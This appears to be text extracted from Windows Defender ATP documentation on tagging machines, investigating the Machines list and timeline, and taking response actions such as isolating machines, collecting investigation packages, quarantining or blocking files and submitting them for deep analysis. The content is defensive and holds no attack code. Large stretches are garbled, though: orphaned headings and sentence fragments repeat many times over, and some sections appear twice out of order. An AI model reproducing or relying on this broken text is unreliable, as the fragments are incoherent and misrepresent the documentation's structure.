You can filter the list based on the grouping and tagging that you've added to individual machines.
Related topics
Create and manage machine tags
Add tags on machines to create a logical group affiliation. Machine group affiliation can represent geographic
location, specific activity, importance level and others.
You can create machine groups in the context of role-based access (RBAC ) to control who can take specific action or
who can see information on a specific machine group or groups by assigning the machine group to a user group.
For more information, see Manage portal access using role-based access control.
You can also use machine groups to assign specific remediation levels to apply during automated investigations.
For more information, see Create and manage machine groups.
In an investigation, you can filter the Machines list to just specific machine groups by using the Groups filter.
Machine tags support proper mapping of the network, enabling you to attach different tags to capture context and
to enable dynamic list creation as part of an incident.
You can add tags on machines using the following ways:
By setting a registry key value
By using the portal
Add machine tags�by setting a registry key value

Add tags on machines which can be used as a filter in Machines list view. You can limit the machines in the list by
selecting the Tag filter on the Machines list.
NOTE
Applicable only on the following machines:
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2
Machines with similar tags can be handy when you need to apply contextual action on a specific list of machines.
Use the following registry key entry to add a tag on a machine:
Registry key: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging\
Registry key value (string): Group
NOTE
The device tag is part of the machine information report that's generated once a day. As an alternative, you may choose to
restart the endpoint that would transfer a new machine information report.
Add machine tags using the portal

Dynamic context capturing is achieved using tags. By tagging machines, you can keep track of individual machines
in your organization. After adding tags on machines, you can apply the Tags filter on the Machines list to get a
narrowed list of machines with the tag.
1. Select the machine that you want to manage tags on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
You can also get to the alert page through the file and IP views.
2. Open the Actions menu and select Manage tags.
3. Enter tags on the machine. To add more tags, click the + icon.
4. Click Save and close.
Tags are added to the machine view and will also be reflected on the Machines list view. You can then use
the Tags filter to see the relevant list of machines.
Manage machine tags
You can manage tags from the Actions button or by selecting a machine from the Machines list and opening the
machine details panel.
Add machine tags using APIs
For more information, see Add or remove machine tags API.
Machines list
Applies to:
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
Logged on users
occurred.
Machine risk
exposed to.
NOTE
advanced features.
Machine reporting

Machine timeline
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
NOTE
events:
Logon users
System
Network
Local service
older.

Related topics
Machines list
Applies to:
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
Logged on users
occurred.
Machine risk
exposed to.
NOTE
advanced features.
Machine reporting

Machine timeline
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
NOTE
events:
Logon users
System
Network
Local service
older.

Related topics
Machines list
Applies to:
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
Logged on users
occurred.
Machine risk
exposed to.
NOTE
advanced features.
Machine reporting

Machine timeline
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
NOTE
events:
Logon users
System
Network
Local service
older.

Related topics
Machines list
Applies to:
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
Logged on users
occurred.
Machine risk
exposed to.
NOTE
advanced features.
Machine reporting

Machine timeline
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
NOTE
events:
Logon users
System
Network
Local service
older.

Related topics
Machines list
Applies to:
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
Logged on users
occurred.
Machine risk
exposed to.
NOTE
advanced features.
Machine reporting

Machine timeline
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
NOTE
events:
Logon users
System
Network
Local service
older.

Related topics
Investigate machines in the Windows Defender
ATP Machines list
Applies to:
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might
be related to the alert or the potential scope of breach.
The Machines list
The Alerts queue
Machine timeline
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an
investigation package available on the machine, you'll see a link that allows you to download the package.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the
following information for logged on users in the past 30 days:
occurred.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be
determined using the number of active alerts or by a combination of multiple risks that may increase the risk
assessment and their severity levels. You can influence a machine's risk level by resolving associated alerts
manually or automatically and also by suppressing an alert. It's also indicators of the active threats that
machines could be exposed to.
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the
link that will take you to the Azure ATP page where more information about the alerts are provided.
NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows
Defender ATP, you can enable this feature in advanced features. For more information on how to enable advanced
features, see Turn on advanced features.
Machine reporting
Provides the last internal IP and external IP of the machine. It also shows when the machine was first and last
seen reporting to the service.

The Alerts related to this machine section provides a list of alerts that are associated with the machine. You
can also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or
Shift + click to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected,
a short description of the alert, the user account associated with the alert, the alert's severity, the alert's status
in the queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine
timeline section to see the correlation between the alert and its related events on the machine by right-
clicking on the alert and selecting Select and mark events. This highlights the alert and its related events
and helps distinguish them from other alerts and events appearing in the timeline. Highlighted events are
displayed in all information levels whether you choose to view the timeline by Detections, Behaviors, or
Verbose.
Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have
been observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period.
You can view the temporal sequence of events that occurred on a machine over a selected time period.
Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines
and displays the process tree flow in the Machine timeline. This gives you better context of the behavior
which can contribute to understanding the correlation between events, files, and IP addresses in relation to
the machine.
Use the search bar to look for specific timeline events. Harness the power of using the following defined
search queries based on type:value pairs and event filter types to sift through the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This
search supports defined search queries based on type:value pairs.
Hash: Sha1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Event type - Click the drop-down button to filter by events such as Windows - Windows Defender
ATP alerts, Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus.
For example, you can search for a file name, then filter the results to only see Process events matching
the search criteria or to only view file events, or even better: to view only network events over a period
of time to make sure no suspicious outbound communications go unnoticed.
NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection.
Firewall covers the following events:
events:
Logon users
System
Network
Local service
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display
the events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that
date and older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the
Alerts view and click on the machine associated with the alert to jump to the specific date when the alert was
observed, enabling you to investigate the events that took place around the alert.
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose
to export the machine timeline for the current date or specify a date range. You can export up to seven days of
data and specify the specific time between the two dates.

Use the events per page drop-down to choose the number of alerts you’d like to see on the page. You can
choose to display 20, 50, or 100 events per page. You can also move between pages by clicking Older or
Newer.
From the Machines list, you can also navigate to the file, IP, or URL view and the timeline associated with an
alert is retained, helping you view the investigation from different angles and retain the context of the event
time line.
From the list of events that are displayed in the timeline, you can examine the behaviors or events in to help
identify indicators of interests such as files and IP addresses to help determine the scope of a breach. You can
then use the information to respond to events and keep your system secure.
You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific
machine.
address in the process tree to investigate additional details of the identified processes. This action brings up
the Details pane which includes execution context of processes, network communications and a summary of
meta data on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing
the need to switch between contexts. It lets you focus on the task of tracing associations between attributes
without leaving the current context.
Related topics
Take response actions in Windows Defender ATP
Applies to:
You can take response actions on machines and files to quickly respond to detected attacks so that you can contain
or reduce and prevent further damage caused by malicious attackers in your organization.
NOTE
The machine related response actions are only available for machines on Windows 10 (version 1703 or higher), Windows
Server, version 1803 and Windows Server 2019.
In this section
TOPIC DESCRIPTION
Take response actions on a machine Isolate machines or collect an investigation package.
Take response actions on a file Stop and quarantine files or block a file from your network.
Applies to:
Quickly respond to detected attacks by isolating machines or collecting an investigation package. After taking
action on machines, you can check activity details on the Action center.
IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.
For non-Windows platforms, response capabilities (such as Machine isolation) are dependent on the third-party
capabilities.
Collect investigation package from machines

As part of the investigation or response process, you can collect an investigation package from a machine. By
collecting the investigation package, you can identify the current state of the machine and further understand the
tools and techniques used by the attacker.
IMPORTANT
This response action is available for machines on Windows 10, version 1703 or later.
You can download the package (Zip file) and investigate the events that occurred on a machine.
The package contains the following folders:
FOLDER DESCRIPTION
Autoruns Contains a set of files that each represent the content of the
registry of a known auto start entry point (ASEP) to help
identify attacker’s persistency on the machine.
NOTE: If the registry key is not found, the file will contain the
following message: “ERROR: The system was unable to find the
specified registry key or value.”
Installed programs This .CSV file contains the list of installed programs that can
help identify what is currently installed on the machine. For
more information, see Win32_Product class.
FOLDER DESCRIPTION
Network connections This folder contains a set of data points related to the
connectivity information which can help in identifying
connectivity to suspicious URLs, attacker’s command and
control (C&C) infrastructure, any lateral movement, or remote
connections.
- ActiveNetworkConnections.txt – Displays protocol statistics
and current TCP/IP network connections. Provides the ability
to look for suspicious connectivity made by a process.
- Arp.txt – Displays the current address resolution protocol

(ARP) cache tables for all interfaces.
ARP cache can reveal additional hosts on a network that have

been compromised or suspicious systems on the network that
night have been used to run an internal attack.
- Dnscache.txt - Displays the contents of the DNS client

resolver cache, which includes both entries preloaded from the
local Hosts file and any recently obtained resource records for
name queries resolved by the computer. This can help in
identifying suspicious connections.
- Ipconfig.txt – Displays the full TCP/IP configuration for all

adapters. Adapters can represent physical interfaces, such as
installed network adapters, or logical interfaces, such as dial-up
connections.
Prefetch files Windows Prefetch files are designed to speed up the

application startup process. It can be used to track all the files
recently used in the system and find traces for applications
that might have been deleted but can still be found in the
prefetch file list.
- Prefetch folder – Contains a copy of the prefetch files from
%SystemRoot%\Prefetch . NOTE: It is suggested to download
a prefetch file viewer to view the prefetch files.
- PrefetchFilesList.txt – Contains the list of all the copied files

which can be used to track if there were any copy failures to
the prefetch folder.
Processes Contains a .CSV file listing the running processes which

provides the ability to identify current processes running on
the machine. This can be useful when identifying a suspicious
process and its state.
Scheduled tasks Contains a .CSV file listing the scheduled tasks which can be
used to identify routines performed automatically on a chosen
machine to look for suspicious code which was set to run
automatically.
Security event log Contains the security event log which contains records of login
or logout activity, or other security-related events specified by
the system's audit policy.
NOTE: Open the event log file using Event viewer.
Services Contains the services.txt file which lists services and their
states.
FOLDER DESCRIPTION
Windows Server Message Block (SMB) sessions Lists shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a network.
This can help identify data exfiltration or lateral movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.
NOTE: If the file contains the following message: “ERROR: The

system was unable to find the specified registry key or value.”,
it means that there were no SMB sessions of this type
(inbound or outbound).
Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.
NOTE: If the file contains the following message: “The system

cannot find the path specified”, it means that there is no temp
directory for this user, and might be because the user didn’t
log in to the system.
Users and Groups Provides a list of files that each represent a group and its
members.
CollectionSummaryReport.xls This file is a summary of the investigation package collection, it

contains the list of data points, the command used to extract
the data, the execution status, and the error code in case of
failure. You can use this report to track if the package includes
all the expected data and identify if there were any errors.
1. Select the machine that you want to investigate. You can select or search for a machine from any of the
following views:
section.
Machines list - Select the heading of the machine name from the machines list.
2. Open the Actions menu and select Collect investigation package.
3. Type a comment and select Yes, collect package to take action on the machine.
The Action center shows the submission information:
Submission time - Shows when the action was submitted.

Status - Indicates if the package was successfully collected from the network. When the collection is
complete, you can download the package.
4. Select Package available to download the package.
When the package is available a new event will be added to the machine timeline.
You can download the package from the machine page, or the Action center.
You can also search for historical packages in the machine timeline.
Run Windows Defender Antivirus scan on machines

As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and
remediate malware that might be present on a compromised machine.
IMPORTANT
This action is available for machines on Windows 10, version 1709 or later.
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether Windows
Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For more information,
see Windows Defender Antivirus compatibility.
1. Select the machine that you want to run the scan on. You can select or search for a machine from any of the
following views:
section.
2. Open the Actions menu and select Run antivirus scan.
3. Select the scan type that you'd like to run. You can choose between a quick or a full scan.
4. Type a comment and select Yes, run scan to start the scan.
The Action center shows the scan information:

Status - Indicates any pending actions or the results of completed actions.
The machine timeline will include a new event, reflecting that a scan action was submitted on the machine.
Windows Defender AV alerts will reflect any detections that surfaced during the scan.
Restrict app execution

In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a device
and prevent subsequent attempts of potentially malicious programs from running.
IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing
requirements. For more information, see Code integrity policy formats and signing.
The action to restrict an application from running applies a code integrity policy that only allows running of files
that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker from
controlling compromised machines and performing further malicious activities.
NOTE
You’ll be able to reverse the restriction of applications from running at any time.
1. Select the machine where you'd like to restrict an application from running from. You can select or search for
a machine from any of the following views:
section.
2. Open the Actions menu and select Restrict app execution.
3. Type a comment and select Yes, restict app execution to take action on the file.

When the application execution restriction configuration is applied, a new event is reflected in the machine timeline.
Notification on machine user:
When an app is restricted, the following notification is displayed to inform the user that an app is being restricted
from running:
Remove app restriction

Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction of
applications policy after you have verified that the compromised machine has been remediated.
1. Select the machine where you restricted an application from running from.
2. Open the Actions menu and select Remove app restrictions.
3. Type a comment and select Yes, remove restriction to take action on the application. The machine
application restriction will no longer apply on the machine.
Isolate machines from the network

Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the machine
from the network. This action can help prevent the attacker from controlling the compromised machine and
performing further activities such as data exfiltration and lateral movement.
IMPORTANT
Full isolation is available for machines on Windows 10, version 1703.
Selective isolation is available for machines on Windows 10, version 1709 or later.
This machine isolation feature disconnects the compromised machine from the network while retaining
connectivity to the Windows Defender ATP service, which continues to monitor the machine.
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can also
choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
You’ll be able to reconnect the machine back to the network at any time.
1. Select the machine that you want to isolate. You can select or search for a machine from any of the following
views:
section.
2. Open the Actions menu and select Isolate machine.
3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is isolated
(a.k.a. 'Selective Isolation').
4. Type a comment and select Yes, isolate machine to take action on the machine.
NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network. If
you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate to the
user while the machine is isolated.

Status - Indicates any pending actions or the results of completed actions. Additional indications will be
provided if you've enabled Outlook and Skype for Business communication.
When the isolation configuration is applied, a new event is reflected in the machine timeline.
When a machine is being isolated, the following notification is displayed to inform the user that the machine is
being isolated from the network:
Release machine from isolation

Depending on the severity of the attack and the state of the machine you can choose to release the machine from
isolation after you have verified that the compromised machine has been remediated.
1. Select a machine that was previously isolated.
2. Open the Actions menu and select Release from isolation.
3. Type a comment and select Yes, release machine to take action on the machine. The machine will be
reconnected to the network.
Check activity details in Action center

The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
following details:
Investigation package collection
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action succeeded
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

IMPORTANT
FOLDER DESCRIPTION
FOLDER DESCRIPTION
connections.




connections.

prefetch file list.


automatically.
states.
FOLDER DESCRIPTION
SMBOutboundSession.


members.

following views:
section.


IMPORTANT
following views:
section.


IMPORTANT
NOTE
section.

from running:


IMPORTANT
NOTE
views:
section.
NOTE



following details:
Antivirus scan
App restriction
Machine isolation
or failed.
Related topic
Applies to:
IMPORTANT
capabilities.

collecting the investigation package, you can identify the current state of the machine and further understand
the tools and techniques used by the attacker.
IMPORTANT
FOLDER DESCRIPTION
NOTE: If the registry key is not found, the file will contain
the following message: “ERROR: The system was unable to
find the specified registry key or value.”
FOLDER DESCRIPTION
control (C&C) infrastructure, any lateral movement, or
remote connections.
- ActiveNetworkConnections.txt – Displays protocol
statistics and current TCP/IP network connections. Provides
the ability to look for suspicious connectivity made by a
process.

ARP cache can reveal additional hosts on a network that

have been compromised or suspicious systems on the
network that night have been used to run an internal
attack.

resolver cache, which includes both entries preloaded from
the local Hosts file and any recently obtained resource
records for name queries resolved by the computer. This can
help in identifying suspicious connections.

installed network adapters, or logical interfaces, such as dial-
up connections.

application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
%SystemRoot%\Prefetch . NOTE: It is suggested to
download a prefetch file viewer to view the prefetch files.


the machine. This can be useful when identifying a
suspicious process and its state.
used to identify routines performed automatically on a
chosen machine to look for suspicious code which was set
to run automatically.
Security event log Contains the security event log which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.
states.
FOLDER DESCRIPTION
miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
SMBOutboundSession.
NOTE: If the file contains the following message: “ERROR:

The system was unable to find the specified registry key or
value.”, it means that there were no SMB sessions of this
type (inbound or outbound).
NOTE: If the file contains the following message: “The

system cannot find the path specified”, it means that there
is no temp directory for this user, and might be because the
user didn’t log in to the system.
members.
CollectionSummaryReport.xls This file is a summary of the investigation package

collection, it contains the list of data points, the command
used to extract the data, the execution status, and the error
code in case of failure. You can use this report to track if the
package includes all the expected data and identify if there
were any errors.
following views:
Security operations dashboard - Select the machine name from the Top machines with active
alerts section.


As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify
and remediate malware that might be present on a compromised machine.
IMPORTANT
A Windows Defender Antivirus (Windows Defender AV) scan can run alongside other antivirus solutions, whether
Windows Defender AV is the active antivirus solution or not. Windows Defender AV can be in Passive mode. For
more information, see Windows Defender Antivirus compatibility.
1. Select the machine that you want to run the scan on. You can select or search for a machine from any of
the following views:
alerts section.


In addition to the ability of containing an attack by stopping malicious processes, you can also lock down a
device and prevent subsequent attempts of potentially malicious programs from running.
IMPORTANT
The action to restrict an application from running applies a code integrity policy that only allows running of
files that are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker
from controlling compromised machines and performing further malicious activities.
NOTE
1. Select the machine where you'd like to restrict an application from running from. You can select or
search for a machine from any of the following views:
alerts section.

When the application execution restriction configuration is applied, a new event is reflected in the machine
timeline.
When an app is restricted, the following notification is displayed to inform the user that an app is being
restricted from running:

Depending on the severity of the attack and the state of the machine, you can choose to reverse the restriction
of applications policy after you have verified that the compromised machine has been remediated.

Depending on the severity of the attack and the sensitivity of the machine, you might want to isolate the
machine from the network. This action can help prevent the attacker from controlling the compromised
machine and performing further activities such as data exfiltration and lateral movement.
IMPORTANT
On Windows 10, version 1709 or later, you'll have additional control over the network isolation level. You can
also choose to enable Outlook and Skype for Business connectivity (a.k.a 'Selective Isolation').
NOTE
1. Select the machine that you want to isolate. You can select or search for a machine from any of the
following views:
alerts section.
3. Select the check-box if you'd like to enable Outlook and Skype communication while the machine is
isolated (a.k.a. 'Selective Isolation').
NOTE
The machine will remain connected to the Windows Defender ATP service even if it is isolated from the network.
If you've chosen to enable Outlook and Skype for Business communication, then you'll be able to communicate
to the user while the machine is isolated.

Status - Indicates any pending actions or the results of completed actions. Additional indications will
be provided if you've enabled Outlook and Skype for Business communication.

Depending on the severity of the attack and the state of the machine you can choose to release the machine
from isolation after you have verified that the compromised machine has been remediated.

The Action center provides information on actions that were taken on a machine or file. You’ll be able to view
the following details:
Antivirus scan
App restriction
Machine isolation
All other related details are also shown, for example, submission time, submitting user, and if the action
succeeded or failed.
Related topic
Applies to:
Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.
IMPORTANT
You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.
Stop and quarantine files in your network

You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.
IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.
The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.
NOTE
You’ll be able to restore the file from quarantine at any time.
Stop and quarantine files

1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
When the file is being removed from a machine, the following notification is shown:
In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.
IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.
Remove file from quarantine

You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:
“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All
NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.
Block files in your network

You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.
IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or
block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.
Enable the block file feature

Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.
Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
2. Open the Actions menu and select Block.
3. Specify a reason and select Yes, block file to take action on the file.

Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.
NOTE
-If a file was scanned before the action was taken, it may take longer to be effective on the device.

When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:
NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.
Remove file from blocked list

1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.
3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
details on the last action that were taken on a file such as stopped and quarantined files or blocked files.
Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE ) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.
NOTE
Only files from Windows 10 can be automatically collected.
You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.
NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.
When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
2. In the Deep analysis section of the file view, click Submit.
Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.
NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.
View deep analysis reports

View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.
Troubleshoot deep analysis

If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value :
Value = 0 – block sample collection
Value = 1 – allow sample collection
5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
Hexadecimal value :
Policy.
Related topic
Applies to:
IMPORTANT

was observed.
IMPORTANT
30 days.
NOTE

the Search box:

IMPORTANT

NOTE

IMPORTANT
time.
block action.
NOTE

Block a file

NOTE

was blocked:
NOTE

Deep analysis
analysis.
NOTE
NOTE
views:
section
NOTE

Behaviors
Observables

applications).
Type: DWORD
